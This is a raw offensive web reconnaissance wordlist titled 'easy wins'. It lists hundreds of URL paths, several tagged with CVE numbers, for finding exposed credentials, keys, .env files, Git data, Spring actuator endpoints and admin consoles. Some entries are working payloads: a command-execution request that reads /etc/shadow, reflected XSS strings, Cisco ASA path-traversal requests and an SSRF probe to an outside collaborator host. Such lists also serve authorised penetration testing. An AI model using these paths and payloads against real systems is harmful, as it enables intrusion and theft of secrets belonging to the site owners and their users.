easy wins - exploitable/leaky web paths

Exploit/description	Path
Microsoft Office Online Server SSRF (relay)	/op/view.aspx
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935	/Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519	/jobmanager/logs/
CVE-2017-7615	/verify.php?id=1&confirm_hash=
CVE-2018-1000130	/jolokia
CVE-2018-1000130	/actuator/jolokia
leak	/actuator/env
leak	/actuator/gateway/routes
leak	/actuator/health
groovy	/bin/groovyconsole/post.json
jmx	/qcbin
jmx	/qcbin/debug
jmx	/qcbin/jmx-console
CVE-2021-43008	/adm
CVE-2021-43008	/adminer.php
CVE-2019-0344	/virtualjdbc/
Tomcat	/%ff
CVE-2019-2616	/xmlpserver/ReportTemplateService
jenkins	script
tomcat	/manager/html
tomcat	/manager/text
werkzeug	/command
CUCM	/ccmcip/xmldirectorylist.jsp
PHP	/_profiler/phpinfo
PHP	/phpmyadmin/
PHP	/phpmyadmin1/index.php
PHP	/phpmyadmin2/index.php
PHP	/phpmyadmin3/index.php
PHP	/phpmyadmin4/index.php
PHP	/sql/sqladmin/index.php
PHP	/sql/webadmin/index.php
PHP	/phpMyAdmin/scripts/setup.php
PHP	/mysql/db/index.php
PHP	/pma/scripts/setup.php
PHP	/phpinfo.php
PHP	/mysql/scripts/setup.php
PHP	/phpMyAdmin2/scripts/setup.php
PHP	/php.php
PHP	/xmlrpc.php?rsd
PHP	/test.php
PHP	/default.php
PHP	/info.php
PHP	/echo.php
leak	/.env
leak	/.env.bak
leak	/config
leak	/credentials
leak	/.aws/credentials
leak	/aws/credentials
leak	/aws/config
leak	/.aws/config
leak	/laravel/.env
leak	/.git/config
leak	.boto
leak	.config/filezilla/filezilla.xml
leak	.config/filezilla/recentservers.xml
leak	.config/gcloud/access_tokens.db
leak	.config/gcloud/credentials.db
leak	.config/hexchat
leak	.config/monero-project/monero-core.conf
leak	.davfs2
leak	.docker/ca.pem
leak	.docker/config.json
leak	.git-credentials
leak	.gitconfig
leak	.netrc
leak	.passwd-s3fs
leak	.purple/accounts.xml
leak	.s3cfg
leak	.s3ql/authinfo2
leak	.ssh/authorized_keys
leak	.ssh/authorized_keys2
leak	.ssh/config
leak	.ssh/id_rsa
leak	.ssh/id_rsa.pub
leak	.ssh/known_hosts
leak	/debug
leak	/debug/default/view
leak	/_ignition/execute-solution
leak	/console/
leak	/config.json
leak	/sdk
leak	/hudson
leak	/manager/text/list
leak	/server-status
leak	/docs/cplugError.html/
leak	/portal/redlion
leak	/Portal/Portal.mwsl
leak	/.DS_Store
leak	/HNAP1
leak	/telescope/requests
OWA Exchange	/autodiscover/autodiscover.xml
OWA Exchange	/owa/auth/logon.aspx
Cisco	/+CSCOE+/logon.html
Cisco	/+CSCOT+/oem
Cisco	/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
Cisco	/+CSCOT+/translation
Cisco	/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
leakypath	/.appveyor.yml
leakypath	/.axiom/accounts/do.json
leakypath	/.azure-pipelines.yml
leakypath	/.build.sh
leakypath	/.bzr/branch/branch.conf
leakypath	/.chef/config.rb
leakypath	/.circleci/config.yml
leakypath	/.circleci/ssh-config
leakypath	/.composer-auth.json
leakypath	/.composer/composer.json
leakypath	/.config/gcloud/access_tokens.db
leakypath	/.config/gcloud/configurations/config_default
leakypath	/.config/gcloud/credentials.db
leakypath	/.config/karma.conf.js
leakypath	/.dbeaver/credentials-config.json
leakypath	/.docker/config.json
leakypath	/.dockercfg
leakypath	/.dockerfile
leakypath	/.drone.yml
leakypath	/.editorconfig
leakypath	/.env.backup
leakypath	/.env.dev
leakypath	/.env.dev.local
leakypath	/.env.development.local
leakypath	/.env.example
leakypath	/.env.live
leakypath	/.env.local
leakypath	/.env.old
leakypath	/.env.prod
leakypath	/.env.prod.local
leakypath	/.env.production
leakypath	/.env.production.local
leakypath	/.env.save
leakypath	/.env.stage
leakypath	/.env.www
leakypath	/.env_1
leakypath	/.env_sample
leakypath	/.esmtprc
leakypath	/.ftpconfig
leakypath	/.git
leakypath	/.git-credentials
leakypath	/.git/head
leakypath	/.git/logs/HEAD
leakypath	/.git/refs/heads
leakypath	/.github/workflows/automerge.yml
leakypath	/.github/workflows/build.yaml
leakypath	/.github/workflows/build.yml
leakypath	/.github/workflows/ci-daily.yml
leakypath	/.github/workflows/ci-generated.yml
leakypath	/.github/workflows/ci-issues.yml
leakypath	/.github/workflows/ci-push.yml
leakypath	/.github/workflows/ci.yaml
leakypath	/.github/workflows/ci.yml
leakypath	/.github/workflows/CI.yml
leakypath	/.github/workflows/coverage.yml
leakypath	/.github/workflows/dependabot.yml
leakypath	/.github/workflows/deploy.yml
leakypath	/.github/workflows/docker.yml
leakypath	/.github/workflows/lint.yml
leakypath	/.github/workflows/main.yaml
leakypath	/.github/workflows/main.yml
leakypath	/.github/workflows/pr.yml
leakypath	/.github/workflows/publish.yml
leakypath	/.github/workflows/push.yml
leakypath	/.github/workflows/release.yaml
leakypath	/.github/workflows/release.yml
leakypath	/.github/workflows/smoosh-status.yml
leakypath	/.github/workflows/snyk.yml
leakypath	/.github/workflows/test.yaml
leakypath	/.github/workflows/test.yml
leakypath	/.github/workflows/tests.yaml
leakypath	/.github/workflows/tests.yml
leakypath	/.gitignore
leakypath	/.hg/hgrc
leakypath	/.htaccess
leakypath	/.htpasswd
leakypath	/.idea/dataSources.xml
leakypath	/.idea/deployment.xml
leakypath	/.idea/httpRequests/http-client.cookies
leakypath	/.idea/httpRequests/http-requests-log.http
leakypath	/.idea/workspace.xml
leakypath	/.jenkins.sh
leakypath	/.mailmap
leakypath	/.msmtprc
leakypath	/.netrc
leakypath	/.npm/anonymous-cli-metrics.json
leakypath	/.phpunit.result.cache
leakypath	/.redmine
leakypath	/.redmine-cli
leakypath	/.settings/rules.json?auth=FIREBASE_SECRET
leakypath	/.snyk
leakypath	/.ssh/authorized_keys
leakypath	/.ssh/id_dsa
leakypath	/.ssh/id_rsa
leakypath	/.ssh/known_hosts
leakypath	/.ssh/known_hosts.old
leakypath	/.styleci.yml
leakypath	/.svn
leakypath	/.svn/entries
leakypath	/.svn/prop
leakypath	/.svn/text
leakypath	/.travis.sh
leakypath	/.tugboat
leakypath	/.user.ini
leakypath	/.vscode/
leakypath	/.well
leakypath	/.well-known/matrix/client
leakypath	/.well-known/matrix/server
leakypath	/.well-known/openid-configuration
leakypath	/.wget-hsts
leakypath	/.wgetrc
leakypath	/.wp-config.php.swp
leakypath
leakypath	//admin/
leakypath	//anything/admin/
leakypath	//secure/ConfigurePortalPages!default.jspa
leakypath	/1.sql
leakypath	/404.php.bak
leakypath	/?view=log
leakypath	/?wsdl
leakypath	/_/.ssh/authorized_keys
leakypath	/___graphql
leakypath	/__clockwork/app
leakypath	/swagger/
leakypath	/_cat/health
leakypath	/_cat/indices
leakypath	/_cluster/health
leakypath	/_config.yml
leakypath	/_darcs/prefs/binaries
leakypath	/_debug_toolbar/
leakypath	/_debugbar/open?max=20&offset=0
leakypath	/_netrc
leakypath	/_notes/dwsync.xml
leakypath	/_profiler/empty/search/results?limit=10
leakypath	/_profiler/phpinfo.php
leakypath	/something.cfm
leakypath	/swagger/
leakypath	/_vti_bin/Authentication.asmx?op=Mode
leakypath	/_vti_bin/lists.asmx?WSDL
leakypath	/abs/
leakypath	/access.log
leakypath	/access/config
leakypath	/access_tokens.db
leakypath	/actions/seomatic/meta
leakypath	/actuator
leakypath	/actuator/auditevents
leakypath	/actuator/auditLog
leakypath	/actuator/beans
leakypath	/actuator/caches
leakypath	/actuator/conditions
leakypath	/actuator/configprops
leakypath	/actuator/configurationMetadata
leakypath	/actuator/dump
leakypath	/actuator/events
leakypath	/actuator/exportRegisteredServices
leakypath	/actuator/favicon.ico
leakypath	/actuator/features
leakypath	/actuator/flyway
leakypath	/actuator/healthcheck
leakypath	/actuator/heapdump
leakypath	/actuator/httptrace
leakypath	/actuator/hystrix.stream
leakypath	/actuator/integrationgraph
leakypath	/actuator/liquibase
leakypath	/actuator/logfile
leakypath	/actuator/loggers
leakypath	/actuator/loggingConfig
leakypath	/actuator/management
leakypath	/actuator/mappings
leakypath	/actuator/metrics
leakypath	/actuator/refresh
leakypath	/actuator/registeredServices
leakypath	/actuator/releaseAttributes
leakypath	/actuator/resolveAttributes
leakypath	/actuator/scheduledtasks
leakypath	/actuator/sessions
leakypath	/actuator/shutdown
leakypath	/actuator/springWebflow
leakypath	/actuator/sso
leakypath	/actuator/ssoSessions
leakypath	/actuator/statistics
leakypath	/actuator/status
leakypath	/actuator/threaddump
leakypath	/actuator/trace
leakypath	/actuators/
leakypath	/actuators/dump
leakypath	/actuators/env
leakypath	/actuators/health
leakypath	/actuators/logfile
leakypath	/actuators/mappings
leakypath	/actuators/shutdown
leakypath	/actuators/trace
leakypath	/adfs/ls/idpinitiatedsignon.aspx
leakypath	/adfs/services/trust/2005/windowstransport
leakypath	/adjuncts/3a890183/
leakypath	/admin
leakypath	/admin.html
leakypath	/admin/
leakypath	/Admin/
leakypath	/admin/phpmyadmin/
leakypath	/admin/adminer.php
leakypath	/admin/configs/application.ini
leakypath	/admin/data/autosuggest
leakypath	/admin/error.log
leakypath	/admin/errors.log
leakypath	/admin/heapdump
leakypath	/admin/index.php
leakypath	/admin/init
leakypath	/admin/log/error.log
leakypath	/admin/login
leakypath	/admin/login.html
leakypath	/admin/login/?next=/admin/
leakypath	/admin/logs/error.log
leakypath	/admin/logs/errors.log
leakypath	/admin/queues.jsp
leakypath	/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/admin/views/ajax/autocomplete/user/a
leakypath	/adminadminer.php
leakypath	/adminer/
leakypath	/adminer/adminer.php
leakypath	/adminer/index.php
leakypath	/ADSearch.cc?methodToCall=search
leakypath	/aims/ps/
leakypath	/airflow.cfg
leakypath	/AirWatch/Login
leakypath	/alps/profile
leakypath	/altair
leakypath	/analytics/saw.dll
leakypath	/anchor/errors.log
leakypath	/android/app/google-services.json
leakypath	/anonymous-cli-metrics.json
leakypath	/ansible.cfg
leakypath	/anything_here
leakypath	/apache
leakypath	/apache.conf
leakypath	/apc.php
leakypath	/apc/apc.php
leakypath	/api
leakypath	/api-docs
leakypath	/api-docs/swagger.json
leakypath	/api-docs/swagger.yaml
leakypath	/api/
leakypath	/api/.env
leakypath	/api/swagger/
leakypath	/api/swagger/
leakypath	/api/api
leakypath	/api/api-browser/
leakypath	/api/api-docs
leakypath	/api/api-docs/swagger.json
leakypath	/api/api-docs/swagger.yaml
leakypath	/api/apidocs
leakypath	/api/apidocs/swagger.json
leakypath	/api/apidocs/swagger.yaml
leakypath	/api/application.wadl
leakypath	/api/batch
leakypath	/api/cask/graphql
leakypath	/api/cask/graphql-playground
leakypath	/api/config
leakypath	/api/docs
leakypath	/api/docs/
leakypath	/api/graphql
leakypath	/api/graphql/v1
leakypath	/api/index.html
leakypath	/api/jolokia/read
leakypath	/api/jsonws
leakypath	/api/jsonws/invoke
leakypath	/api/profile
leakypath	/api/proxy
leakypath	/api/snapshots
leakypath	/api/spec/swagger.json
leakypath	/api/spec/swagger.yaml
leakypath	/api/swagger
leakypath	/api/swagger-resources
leakypath	/api/swagger-resources/restservices/v2/api-docs
leakypath	/api/swagger-ui.html
leakypath	/api/swagger-ui/api-docs
leakypath	/api/swagger-ui/swagger.json
leakypath	/api/swagger-ui/swagger.yaml
leakypath	/api/swagger.json
leakypath	/api/swagger.yaml
leakypath	/api/swagger.yml
leakypath	/api/swagger/index.html
leakypath	/api/swagger/static/index.html
leakypath	/api/swagger/swagger
leakypath	/api/swagger/swagger-ui.html
leakypath	/api/swagger/ui/index
leakypath	/api/swagger_doc.json
leakypath	/api/timelion/run
leakypath	/api/v1
leakypath	/api/v1/
leakypath	/api/v1/application.wadl
leakypath	/api/v1/canal/config/1/1
leakypath	/api/v1/namespaces
leakypath	/api/v1/namespaces/default/pods
leakypath	/api/v1/namespaces/default/secrets
leakypath	/api/v1/namespaces/default/services
leakypath	/api/v1/nodes
leakypath	/api/v1/swagger-ui/swagger.json
leakypath	/api/v1/swagger-ui/swagger.yaml
leakypath	/api/v1/swagger.json
leakypath	/api/v1/swagger.yaml
leakypath	/api/v2
leakypath	/api/v2/application.wadl
leakypath	/api/v2/swagger.json
leakypath	/api/v2/swagger.yaml
leakypath	/api/vendor/phpunit/phpunit/phpunit
leakypath	/api/whoami
leakypath	/api_docs
leakypath	/api_smartapp/storage/
leakypath	/apis
leakypath	/apis/apps/v1/namespaces/default/deployments
leakypath	/aplicacao/application/configs/application.ini
leakypath	/app/config/parameters.yml
leakypath	/app/config/parameters.yml.dist
leakypath	/app/config/pimcore/google-api-private-key.json
leakypath	/app/config/security.yml
leakypath	/app/etc/local.xml
leakypath	/app/google-services.json
leakypath	/app/kibana/
leakypath	/app/settings.py
leakypath	/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/application.ini
leakypath	/application.wadl
leakypath	/application.wadl?detail=true
leakypath	/application/configs/application.ini
leakypath	/application/logs/access.log
leakypath	/application/logs/application.log
leakypath	/application/logs/default.log
leakypath	/apps/vendor/phpunit/phpunit/phpunit
leakypath	/appsettings.json
leakypath	/appspec.yaml
leakypath	/appspec.yml
leakypath	/appveyor.yml
leakypath	/asdf.php
leakypath	/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/assets../.git/config
leakypath	/assets/.gitignore
leakypath	/assets/config.rb
leakypath	/assets/credentials.json
leakypath	/assets/file
leakypath	/assets/other/service-account-credentials.json
leakypath	/asynchPeople/
leakypath	/auditevents
leakypath	/aura
leakypath	/auth.html
leakypath	/auth/login
leakypath	/auth/realms/master/.well-known/openid-configuration
leakypath	/authorization.do
leakypath	/autoconfig
leakypath	/autodiscover/
leakypath	/autoupdate/
leakypath	/aws.sh
leakypath	/awstats.conf
leakypath	/awstats.pl
leakypath	/awstats/
leakypath	/axis/
leakypath	/axis/happyaxis.jsp
leakypath	/axis2-web/HappyAxis.jsp
leakypath	/axis2/
leakypath	/axis2/axis2-web/HappyAxis.jsp
leakypath	/azure-pipelines.yml
leakypath	/backend
leakypath	/backup
leakypath	/backup.sh
leakypath	/backup.sql
leakypath	/backup/vendor/phpunit/phpunit/phpunit
leakypath	/base/static/c
leakypath	/beans
leakypath	/BitKeeper/etc/config
leakypath	/blog/
leakypath	/blog/phpmyadmin/
leakypath	/bower.json
leakypath	/brightmail/servlet/com.ve.kavachart.servlet.ChartStream
leakypath	/bugs/verify.php?confirm_hash=&id=1
leakypath	/build.sh
leakypath	/bundles/kibana.style.css
leakypath	/bundles/login.bundle.js
leakypath	/cacti/
leakypath	/certenroll/
leakypath	/certprov/
leakypath	/certsrv/
leakypath	/cfcache.map
leakypath	/CFIDE/administrator/images/background.jpg
leakypath	/cfide/administrator/images/background.jpg
leakypath	/CFIDE/administrator/images/componentutilslogin.jpg
leakypath	/cfide/administrator/images/componentutilslogin.jpg
leakypath	/CFIDE/administrator/images/mx_login.gif
leakypath	/cfide/administrator/images/mx_login.gif
leakypath	/cgi
leakypath	/cgi-bin/nagios3/status.cgi
leakypath	/cgi-bin/nagios4/status.cgi
leakypath	/cgi-bin/printenv.pl
leakypath	/cgi-bin/upload/web-ftp.cgi
leakypath	/CGI/Java/Serviceability?adapter=device.statistics.configuration
leakypath	/CgiStart?page=Single
leakypath	/CHANGELOG.md
leakypath	/ckeditor/samples/
leakypath	/client_secrets.json
leakypath	/cloud-config.yml
leakypath	/cloudexp/application/configs/application.ini
leakypath	/cloudfoundryapplication
leakypath	/cluster/cluster
leakypath	/cms/application/configs/application.ini
leakypath	/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/cobbler_api
leakypath	/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/compile.sh
leakypath	/composer.json
leakypath	/composer.lock
leakypath	/conf/
leakypath	/config.js
leakypath	/config.php.bak
leakypath	/config.rb
leakypath	/config.sh
leakypath	/config/
leakypath	/config/configuration.yml
leakypath	/config/database.yml
leakypath	/config/databases.yml
leakypath	/config/environment.rb
leakypath	/config/error_log
leakypath	/config/initializers/secret_token.rb
leakypath	/config/jwt/private.pem
leakypath	/config/packages/security.yaml
leakypath	/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E
leakypath	/config/properties.ini
leakypath	/config/secrets.yml
leakypath	/config/security.yml
leakypath	/config/settings.yml
leakypath	/config/storage.yml
leakypath	/config/user.xml
leakypath	/configprops
leakypath	/configuration.php-dist
leakypath	/configuration.yml
leakypath	/configurations/config_default
leakypath	/configure/app/landing/welcome-srm-va.html
leakypath	/confluence
leakypath	/conn.php.bak
leakypath	/console
leakypath	/console/login/LoginForm.jsp
leakypath	/contact.php
leakypath	/content../.git/config
leakypath	/context.json
leakypath	/control/login
leakypath	/control/stream?contentId=<svg/onload=alert(1)>
leakypath	/controller/config
leakypath	/controller/registry
leakypath	/controller/registry-clients
leakypath	/core-cloud-config.yml
leakypath	/core/config/databases.yml
leakypath	/counters
leakypath	/cp/Shares?user=&protocol=webaccess&v=2.3
leakypath	/credentials.db
leakypath	/credentials.json
leakypath	/crossdomain.xml
leakypath	/crowd/console/login.action
leakypath	/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
leakypath	/crx/de/index.jsp
leakypath	/cs/idcplg
leakypath	/css../.git/config
leakypath	/CTCWebService/CTCWebServiceBean
leakypath	/CTCWebService/CTCWebServiceBean?wsdl
leakypath	/darkstat/
leakypath	/dasbhoard/
leakypath	/dashboard/
leakypath	/dashboard/phpinfo.php
leakypath	/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1
leakypath	/data.sql
leakypath	/data/adminer.php
leakypath	/data/autosuggest
leakypath	/data?get=prodServerGen
leakypath	/database.php.bak
leakypath	/database.sql
leakypath	/database/schema.rb
leakypath	/db.php.bak
leakypath	/db.sql
leakypath	/db/robomongo.json
leakypath	/db/schema.rb
leakypath	/db_backup.sql
leakypath	/db_config.php.bak
leakypath	/dbaas_monitor/login
leakypath	/dbdump.sql
leakypath	/debug.cgi
leakypath	/debug.seam
leakypath	/debug/default/view.html
leakypath	/debug/pprof/
leakypath	/debug/vars
leakypath	/default.php.bak
leakypath	/demo
leakypath	/deploy.sh
leakypath	/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
leakypath	/desktop.ini
leakypath	/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1
leakypath	/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1
leakypath	/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1
leakypath	/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/dev2local.sh
leakypath	/development.log
leakypath	/dfshealth.html
leakypath	/dialin/
leakypath	/dispatcher/invalidate.cache
leakypath	/django/settings.py
leakypath	/doc/page/login.asp
leakypath	/doc/script/common.js
leakypath	/docker-cloud.yml
leakypath	/docker-compose-dev.yml
leakypath	/docker-compose.dev.yml
leakypath	/docker-compose.override.yml
leakypath	/docker-compose.prod.yml
leakypath	/docker-compose.production.yml
leakypath	/docker-compose.staging.yml
leakypath	/docker-compose.yml
leakypath	/Dockerrun.aws.json
leakypath	/docs
leakypath	/docs/swagger.json
leakypath	/domcfg.nsf
leakypath	/download
leakypath	/druid/coordinator/v1/leader
leakypath	/druid/coordinator/v1/metadata/datasources
leakypath	/druid/index.html
leakypath	/druid/indexer/v1/taskStatus
leakypath	/dump
leakypath	/dump.sql
leakypath	/dwr/index.html
leakypath	/eam/vib?id=/etc/issue
leakypath	/ecp/
leakypath	/editor/ckeditor/samples/
leakypath	/elfinder.html
leakypath	/elmah.axd
leakypath	/elocker_old/storage/
leakypath	/email/unsubscribed
leakypath	/emergency.php
leakypath	/env
leakypath	/env.dev.js
leakypath	/env.development.js
leakypath	/env.js
leakypath	/env.prod.js
leakypath	/env.production.js
leakypath	/env.sh
leakypath	/env.test.js
leakypath	/environment.rb
leakypath	/equipbid/storage/
leakypath	/error
leakypath	/error.log
leakypath	/error.txt
leakypath	/error/error.log
leakypath	/error_log
leakypath	/error_log.txt
leakypath	/errors.log
leakypath	/errors.txt
leakypath	/errors/errors.log
leakypath	/errors_log
leakypath	/etc
leakypath	/etc/
leakypath	/events
leakypath	/ews/
leakypath	/examples/jsp/index.html
leakypath	/examples/jsp/snp/snoop.jsp
leakypath	/examples/servlets/index.html
leakypath	/examples/websocket/index.xhtml
leakypath	/exchange/
leakypath	/exchweb/
leakypath	/explore
leakypath	/explorer
leakypath	/express
leakypath	/express-graphql
leakypath	/extdirect
leakypath	/favicon.ico
leakypath	/fckeditor/_samples/default.html
leakypath	/fetch
leakypath	/filemanager/upload.php
leakypath	/filezilla.xml
leakypath	/FileZilla.xml
leakypath	/filter/jmol/iframe.php
leakypath	/filter/jmol/js/jsmol/php/jsmol.php
leakypath	/final/
leakypath	/flow/registries
leakypath	/footer.php.bak
leakypath	/forum/phpmyadmin/
leakypath	/frontend/web/debug/default/view
leakypath	/ftpsync.settings
leakypath	/fw.login.php
leakypath	/gallery/zp
leakypath	/Gemfile
leakypath	/Gemfile.lock
leakypath	/getcfg.php
leakypath	/getFavicon?host=burpcollaborator.net
leakypath	/global
leakypath	/glpi/status.php
leakypath	/glpi2/status.php
leakypath	/google-api-private-key.json
leakypath	/google-services.json
leakypath	/gotoURL.asp?url=google.com&id=43569
leakypath	/graph
leakypath	/graph_cms
leakypath	/graphiql
leakypath	/graphiql.css
leakypath	/graphiql.js
leakypath	/graphiql.min.css
leakypath	/graphiql.min.js
leakypath	/graphiql.php
leakypath	/graphiql/finland
leakypath	/graphql
leakypath	/graphql-console
leakypath	/graphql-devtools
leakypath	/graphql-explorer
leakypath	/graphql-playground
leakypath	/graphql-playground-html
leakypath	/graphql.php
leakypath	/graphql/console
leakypath	/graphql/graphql
leakypath	/graphql/graphql-playground
leakypath	/graphql/schema.json
leakypath	/graphql/schema.xml
leakypath	/graphql/schema.yaml
leakypath	/graphql/v1
leakypath	/groovyconsole
leakypath	/groupexpansion/
leakypath	/Gruntfile.coffee
leakypath	/Gruntfile.js
leakypath	/guest/users/forgotten
leakypath	/happyaxis.jsp
leakypath	/header.php.bak
leakypath	/health
leakypath	/healthz
leakypath	/heapdump
leakypath	/help/index.jsp
leakypath	/home.html
leakypath	/homepage.nsf
leakypath	/hopfully404
leakypath	/host.key
leakypath	/hosts
leakypath	/hsqldb%0a
leakypath	/httpd.conf
leakypath	/hybridconfig/
leakypath	/HyperGraphQL
leakypath	/hystrix.stream
leakypath	/i.php
leakypath	/id_dsa
leakypath	/id_rsa
leakypath	/IdentityGuardSelfService/
leakypath	/IdentityGuardSelfService/images/favicon.ico
leakypath	/images../.git/config
leakypath	/images/favicon.ico
leakypath	/img../.git/config
leakypath	/IMS
leakypath	/includes/.gitignore
leakypath	/index.htm
leakypath	/index.html
leakypath	/index.jsp
leakypath	/index.php
leakypath	/INF/maven/com.atlassian.jira/atlassian
leakypath	/info/
leakypath	/infophp.php
leakypath	/infos.php
leakypath	/init.sh
leakypath	/inormalydonotexist
leakypath	/iNotes/Forms5.nsf
leakypath	/iNotes/Forms6.nsf
leakypath	/iNotes/Forms7.nsf
leakypath	/iNotes/Forms8.nsf
leakypath	/iNotes/Forms85.nsf
leakypath	/iNotes/Forms9.nsf
leakypath	/install
leakypath	/install.php?profile=default
leakypath	/install.sh
leakypath	/install/lib/ajaxHandlers/ajaxServerSettingsChk.php
leakypath	/installer
leakypath	/intikal/storage/
leakypath	/invoker/EJBInvokerServlet/
leakypath	/invoker/JMXInvokerServlet
leakypath	/invoker/JMXInvokerServlet/
leakypath	/ioncube/loader-wizard.php
leakypath	/ipython/tree
leakypath	/irj/portal
leakypath	/iwc/idcStateError.iwc
leakypath	/jasperserver/login.html?error=1
leakypath	/je/graphql
leakypath	/jeecg-boot/
leakypath	/jenkins/descriptorByName/AuditTrailPlugin/regexCheck
leakypath	/jenkins/script
leakypath	/jira/secure/Dashboard.jspa
leakypath	/jkstatus
leakypath	/jkstatus/
leakypath	/jmx
leakypath	/jobmanager/
leakypath	/jolokia/exec/ch.qos.logback.classic
leakypath	/jolokia/list
leakypath	/jolokia/read
leakypath	/jolokia/version
leakypath	/josso/
leakypath	/js../.git/config
leakypath	/js/elfinder.min.js
leakypath	/js/elFinder.version.js
leakypath	/jsapi_ticket.json
leakypath	/jsonapi/user/user
leakypath	/jsp/help
leakypath	/jwt/private.pem
leakypath	/karma.conf.js
leakypath	/key.pem
leakypath	/keycloak.json
leakypath	/kustomization.yml
leakypath	/laravel
leakypath	/laravel-graphql-playground
leakypath	/lfm.php
leakypath	/lib../.git/config
leakypath	/lib/phpunit/phpunit/phpunit
leakypath	/libraries/joomla/database/
leakypath	/libs/granite/core/content/login/favicon.ico
leakypath	/LICENSE.txt
leakypath	/linusadmin-phpinfo.php
leakypath	/linuxki/experimental/vis/kivis.php
leakypath	/loader-wizard.php
leakypath	/loadtextfile.htm#programinfo
leakypath	/local2dev.sh
leakypath	/local2prod.sh
leakypath	/localhost.key
leakypath	/localhost.sql
leakypath	/log.log
leakypath	/log.txt
leakypath	/log/access.log
leakypath	/log/debug.log
leakypath	/log/development.log
leakypath	/log/error.log
leakypath	/log/errors.log
leakypath	/log/firewall.log
leakypath	/log/mobile.log
leakypath	/log/production.log
leakypath	/log/system.log
leakypath	/log/vpn.log
leakypath	/log/warn.log
leakypath	/log
leakypath	/logfile
leakypath	/loggers
leakypath	/login
leakypath	/login.jsp
leakypath	/login.php
leakypath	/login.php.bak
leakypath	/logon/LogonPoint/custom.html
leakypath	/logon/LogonPoint/index.html
leakypath	/logs.txt
leakypath	/logs/access.log
leakypath	/logs/awstats.pl
leakypath	/logs/development.log
leakypath	/logs/error.log
leakypath	/logs/errors.log
leakypath	/logs/production.log
leakypath	/lol/graphql
leakypath	/magmi/web/js/magmi_utils.js
leakypath	/mailsms/s?func=ADMIN:appState&dumpConfig=/
leakypath	/main.php.bak
leakypath	/management
leakypath	/mantis/verify.php?id=1&confirm_hash=
leakypath	/mantisBT/verify.php?id=1&confirm_hash=
leakypath	/mappings
leakypath	/mcx/
leakypath	/mcx/mcxservice.svc
leakypath	/meaweb/os/mxperson
leakypath	/media
leakypath	/meet/
leakypath	/meeting/
leakypath	/message
leakypath	/metrics
leakypath	/mgmt/tm/sys/management
leakypath	/mgmt/tm/sys/management-ip
leakypath	/microsoft
leakypath	/MicroStrategy/servlet/taskProc
leakypath	/mifs/c/d/android.html
leakypath	/mifs/login.jsp
leakypath	/mifs/user/login.jsp
leakypath	/mobile/error
leakypath	/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1
leakypath	/modules/system/assets/js/framework.combined-min.js
leakypath	/modules/vendor/phpunit/phpunit/phpunit
leakypath	/moto/application/configs/application.ini
leakypath	/mrtg/
leakypath	/MRTG/
leakypath	/my.key
leakypath	/my.ppk
leakypath	/MyErrors.log
leakypath	/mysql.initial.sql
leakypath	/mysql.sql
leakypath	/mysqlbackup.sh
leakypath	/mysqldump.sql
leakypath	/nagios/cgi-bin/status.cgi
leakypath	/names.nsf/People?OpenView
leakypath	/nbproject/project.properties
leakypath	/nextcloud/index.php/login
leakypath	/nginx.conf
leakypath	/nginx_status
leakypath	/ngrok2/ngrok.yml
leakypath	/nifi-api/access/config
leakypath	/node/1?_format=hal_json
leakypath	/npm-debug.log
leakypath	/npm-shrinkwrap.json
leakypath	/nuxeo/login.jsp
leakypath	/OA_HTML/bin/sqlnet.log
leakypath	/OA_HTML/jtfwrepo.xml
leakypath	/oab/
leakypath	/oauth-credentials.json
leakypath	/oauth/token
leakypath	/occ/v2/d2OzBcy
leakypath	/ocsp/
leakypath	/old/vendor/phpunit/phpunit/phpunit
leakypath	/old_phpinfo.php
leakypath	/oldsite/vendor/phpunit/phpunit/phpunit
leakypath	/opcache
leakypath	/opcache-status/
leakypath	/opcache-status/opcache.php
leakypath	/openapi.json
leakypath	/Orion/Login.aspx
leakypath	/os/mxperson
leakypath	/ovirt-engine/
leakypath	/owa/
leakypath	/owncloud/config/
leakypath	/package
leakypath	/package-lock.json
leakypath	/package.json
leakypath	/pages
leakypath	/pages/includes/status
leakypath	/parameters.yml
leakypath	/parameters.yml.dist
leakypath	/Partners/application/configs/application.ini
leakypath	/pdb/meta/v1/version
leakypath	/PDC/ajaxreq.php?PARAM=127.0.0.1+
leakypath	/perl
leakypath	/perl-status
leakypath	/persistentchat/
leakypath	/phoneconferencing/
leakypath	/php
leakypath	/php-fpm.conf
leakypath	/php-info.php
leakypath	/php-opcache-status/
leakypath	/php.ini
leakypath	/php/adminer.php
leakypath	/php/phpmyadmin/
leakypath	/php_info.php
leakypath	/phppgadmin/intro.php
leakypath	/phpstan.neon
leakypath	/phpunit.xml
leakypath	/phpversion.php
leakypath	/pimcore/app/config/pimcore/google-api-private-key.json
leakypath	/pinfo.php
leakypath	/playground
leakypath	/plesk-stat/
leakypath	/plugin/build
